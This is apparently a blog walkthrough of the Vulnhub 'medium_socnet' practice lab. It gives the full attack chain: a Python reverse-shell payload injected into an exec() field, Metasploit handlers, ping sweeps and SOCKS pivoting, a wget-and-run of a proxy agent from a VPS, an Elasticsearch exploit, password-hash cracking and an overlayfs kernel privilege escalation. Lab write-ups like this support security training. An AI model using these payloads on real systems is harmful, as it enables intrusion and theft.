[Vulnhub lab] medium_socnet

Table of contents

  • Environment setup
  • Information gathering
    • Host discovery
    • Port scanning
  • Web penetration
    • (CVE-2019-14322) Pallets Werkzeug 0.15.4 path traversal vulnerability
    • Code injection: reverse shell
    • About Dockerfile
    • Determining whether we are in a Docker environment
    • Upgrading the command shell to Meterpreter
      • Method 1
      • Method 2
  • An internal network inside the Docker environment
    • Internal host discovery
    • Shell script: ping sweep for live IPs
    • Internal network pivoting: local msf automation
    • Manual internal network pivoting via a public VPS
      • Venom proxy
  • Exploitation: kernel privilege escalation and modifying the exploit code
  • Reflections and open questions


Keywords: host discovery, port scanning, service discovery, path enumeration, code injection, shell scripting, internal network information gathering, internal network pivoting, exploitation, password cracking, local privilege escalation, exploit code modification

Environment setup

Official download address (the download is slow): https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
Baidu Cloud mirror of the target VM
When I set it up the first time, host discovery showed the target exposing only SSH on port 22, and I wondered whether the whole box came down to SSH brute-forcing. After checking, the target should also expose port 5000; re-downloading and re-importing the VM fixed it. (There is also a case where the host cannot be discovered at all, which is probably a network adapter setting problem.)

Information gathering

Host discovery

arp-scan -l

Port scanning

nmap -sS -sV -T4 -A -p- 10.10.10.154

Two lines of attack: 1. SSH brute-forcing; 2. the Python web service on port 5000.
SSH brute-forcing: depends on luck.

use auxiliary/scanner/ssh/ssh_login
set rhost 10.10.10.154
set USER_FILE user.txt
set PASS_FILE pass.txt
run

Web penetration

Directory scanning with dirsearch

python3 dirsearch.py -u http://10.10.10.154:5000/ -e html js

Tried a bit of XSS, not analysed further.
Based on the service information from the scan:

5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
Look up known vulnerabilities for this version.

(CVE-2019-14322) Pallets Werkzeug 0.15.4 path traversal vulnerability

Searching Werkzeug's vulnerability history turned up this one:
In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names in Windows pathnames.
Tried the PoC; the vulnerability is not present here (the bug concerns Windows drive names, so a Linux target is not affected regardless of version).

Code injection: reverse shell


According to the hint on the page, there may be code execution here.
Reverse shell generator: https://forum.ywhack.com/shell.php

The target is a Python environment, so try injecting the Python version of the reverse shell command.


Another issue: the commands the generator gives are all meant to be run from a command line, but the hint on the target page says the input is executed by the exec() function, so the shell does not come back if the command is copied as-is.


Keeping only the middle argument part (the Python code itself, without the surrounding command-line wrapper) makes it connect back normally.

Payload

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("47.94.xx.xx",5566));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

In Python, semicolons can separate multiple statements; here they put everything on one line so that only a single line needs to be pasted into the input field.
After running a few commands, a Dockerfile is found, which suggests the web service on port 5555 is running inside Docker.

About Dockerfile

A Dockerfile defines the image, and the container is run from that image, so the Dockerfile is the key to both the image and the container.
A Dockerfile is a text file containing a series of instructions; each instruction builds one layer, so each instruction describes how that layer should be built.

Determining whether we are in a Docker environment

Method 1: check for the .dockerenv file in the root directory

ls -alh /.dockerenv  # a non-Docker environment does not have this .dockerenv file


Method 2: query the cgroup information of the init process

cat /proc/1/cgroup

Output in a Docker environment:

Output in a non-Docker environment:

Confirmed: this is a Docker environment.
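The two checks above, wrapped in one function as an added example (not code from the original post): the function takes the /.dockerenv and cgroup paths as arguments so it can be exercised against constructed sample files, and the live-system call is just the same function with the real paths.

```sh
#!/bin/sh
# Added example, not from the original post. Combines the /.dockerenv and
# /proc/1/cgroup indicators; paths are parameters so the logic can be run
# against constructed sample files as well as the live system.

# docker_indicators DOCKERENV_PATH CGROUP_PATH
# Prints which indicators fired; returns 0 (true) if either points at a container.
docker_indicators() {
    env_file="$1"
    cgroup_file="$2"
    found=1
    if [ -e "$env_file" ]; then
        echo "dockerenv : present"
        found=0
    else
        echo "dockerenv : absent"
    fi
    # cgroup v1 lines inside a container look like 12:pids:/docker/<id>;
    # on the host the path is / or something like /init.scope
    if [ -r "$cgroup_file" ] && grep -qE ':/(docker|lxc|kubepods)(/|$)' "$cgroup_file"; then
        echo "cgroup    : container path found"
        found=0
    else
        echo "cgroup    : no container path"
    fi
    return $found
}

# Checking the live system is the same call with the real paths.
check_live_system() {
    docker_indicators /.dockerenv /proc/1/cgroup
}

# Constructed sample files standing in for the two environments.
SAMPLE_DIR=$(mktemp -d)
printf '12:pids:/docker/0123456789abcdef\n11:cpu:/docker/0123456789abcdef\n' > "$SAMPLE_DIR/cgroup_container"
printf '12:pids:/\n1:name=systemd:/init.scope\n' > "$SAMPLE_DIR/cgroup_host"

echo "--- constructed container sample ---"
docker_indicators "$SAMPLE_DIR/no-such-file" "$SAMPLE_DIR/cgroup_container" || true
echo "--- constructed host sample ---"
docker_indicators "$SAMPLE_DIR/no-such-file" "$SAMPLE_DIR/cgroup_host" || true
rm -rf "$SAMPLE_DIR"
```

On a cgroup v2 host /proc/1/cgroup reads 0::/ even inside a container, so the cgroup check alone can give a false negative; that is why both indicators are combined.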

Upgrading the command shell to Meterpreter

Because msf is more convenient, hand the shell over to msf.

msf6> use exploit/multi/handler
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 6677
msf6 exploit(multi/handler) > exploit

The handler listens on local port 6677 in another window, and the reverse shell is sent again with nc.

Now there is only a plain command shell; to use msf's other features, upgrade it to Meterpreter.

Method 1

sessions -u 1


Unfortunately the upgrade did not succeed on the public VPS.
Testing with Kali on the same LAN: it works.

Method 2

msf6 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > exploit

The upgrade still failed here; I guess it is a problem with the public VPS I use, since local Kali works.

An internal network inside the Docker environment

Internal host discovery

ip a


The subnet mask here is 16 bits, so there could be up to 2^16 hosts.

Shell script: ping sweep for live IPs

for i in $(seq 0 255); do for j in $(seq 1 254); do ping -c 1 -W 1 172.17.$i.$j; done; done  # sweep all of 172.17.0.0/16, roughly 65535 hosts

Since this is a Docker environment, not that many containers will be running, so only the C segment is scanned:

for i in $(seq 1 254); do ping -c 1 -W 1 172.17.0.$i | grep 'bytes from'; done  # print only the hosts that reply


Three hosts are alive: our own 172.17.0.2, plus 172.17.0.1 and 172.17.0.3.
Other tools cannot be used directly from the reverse bash shell for pivoting, so a proxy is used here.

Internal network pivoting: local msf automation

Add routes automatically:


Add a SOCKS proxy:

use auxiliary/server/socks_proxy
set SRVPORT 1234

Modify the proxychains configuration file:

vi /etc/proxychains.conf


Then prefix subsequent operations with proxychains.

Service detection from local Kali is much faster than through the VPS.

proxychains nmap -sV -sT 172.17.0.1

proxychains nmap -sV -sT 172.17.0.2


Note the HTTP service on port 9200 here.

proxychains nmap -sV -sT 172.17.0.3


Several questions remain:

  • Hosts .1 and .3 both have port 5000 with the same service. Which one is the internal IP of 10.10.10.154?
  • And what is the network layout of the internal environment built with Docker?

Use the SOCKS proxy setting in local Kali's Firefox to access port 5000 on hosts .1 and .3 and port 9200 on host .2.

Comparing this with visiting 10.10.10.154 from the physical machine and leaving a message, both .1 and .3 correspond to this website.

Access 172.17.0.2:9200.

Search online for known vulnerabilities in the exposed Elasticsearch 1.4.2.
A ready-made EXP can be used directly:
https://github.com/t0kx/exploit-CVE-2015-1427

It gives root directly, but this one seems to be only a PoC.
An EXP can also be found via msf:

searchsploit elasticsearch

proxychains python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2


This yields some usernames and MD5 password hashes; submit them to cmd5.com for cracking.

Some can be cracked; some require payment…
The one that works for login is john:1337hack
SSH login works directly with it.
After logging in via SSH, it turns out to be an ordinary (unprivileged) user.

== Privilege escalation ==

Manual internal network pivoting via a public VPS

Venom proxy

https://github.com/Dliv3/Venom

Venom is a multi-level proxy tool written in Go, designed for penetration testers.
Venom can connect multiple nodes and then use those nodes as pivots to build multi-level proxies.
Penetration testers can use Venom to easily proxy network traffic into multi-layer internal networks and manage the proxy nodes.

Start the server (on the VPS):

./admin_linux_x64 -lport 7777

Serve the agent with a temporary Python HTTP server, then download and run it on the target:

python3 -m http.server 88  # note: run this in the Venom directory

Run in the target's shell:

wget http://47.94.130.42:88/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 47.94.130.42 -rport 7777  # start the client


The server receives the connection and a session is obtained; enter that session and open a SOCKS proxy.

Of course, a tool is still needed to forward traffic; on Linux that is proxychains.
For proxy details on Windows, see "Proxy SOCKS Protocol & Routing Does Not Go Online & Post-Exploitation Communication & CS-MSF Control Goes Online".
Here I use local Kali to connect to the SOCKS proxy opened on the VPS (the tooling is more convenient).
Modify the configuration file:

vim /etc/proxychains.conf

proxychains nmap -sV -sT 172.17.0.1

No port range is specified here, so only common services and ports are scanned.

proxychains nmap -sV -sT 172.17.0.1 -p 1-65535  # the -p parameter specifies the port range


The full scan takes only a minute or two; without going through the public proxy it would be faster. Of course, in a real environment the scan rate needs to be throttled to keep the proxy IP from being blocked. The remaining pivoting steps are the same as the msf automation above, so no further demo.

Exploitation: kernel privilege escalation and modifying the exploit code


Here I uploaded les.sh for analysis to look for exploitable vulnerabilities. At first I went for the classic Dirty COW, but when compiling I found there is no gcc on the target, and of course no permission to use the package manager to install one. I wondered whether another compiler such as clang or tcc might be available to build my own exploit; of course there was none either. So what about compiling it locally and uploading the executable? We all know that binaries built for different Linux architectures (different instruction sets) are not interchangeable. Searching online: GCC can cross-compile, that is, one machine can produce programs for several architectures, so an x86 box can build a program that runs on ARM. So I uploaded the Dirty COW exploit compiled locally on Kali to the target.
It reported that the libstdc++ library was missing. Tried apt-get install libstdc++6: permission denied. So can the library file be copied over from Kali? The copied file would have to go in /usr/lib/ for the program to find it, but an ordinary user cannot write there. Just as I was despairing, I saw the "exploit code modification" hint from the lab and thought of changing the Dirty COW source to load the library from a location I control, then recompiling and running it. But my skills were not up to it; after staring at the C source for a while I was at a loss… (There is no trace of library loading in the Dirty COW EXP source, so switch to a different vulnerability for privilege escalation.)

**This is the vulnerability the other experts used: 'overlayfs' Local Privilege Escalation**
Applicable Linux kernel versions: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)
Location of the EXP on Kali:

/usr/share/exploitdb/exploits/linux/local/37292.c


Delete the unnecessary part of the code and compile it on Kali; it is normal for an error to be reported, and the binary is still produced.
Following the idea above, locate the ofs-lib.so file, pack it together with the binary, place both on the target, make them executable and run.

locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so

Reflections and open questions

Not yet skilled at using msf exploits.
Not familiar with building an internal network environment with Docker.
After seeing the Docker environment, I did not try any escape techniques, because the lab description did not include the keyword "escape"; in a real environment one should try to escape.
My ability to modify an EXP is not good enough, and I am not familiar with library loading and the compilation process.
One VM took a whole day, emmm.
If the article is lacking, it will be supplemented later.


2023-3-24, written by whgojp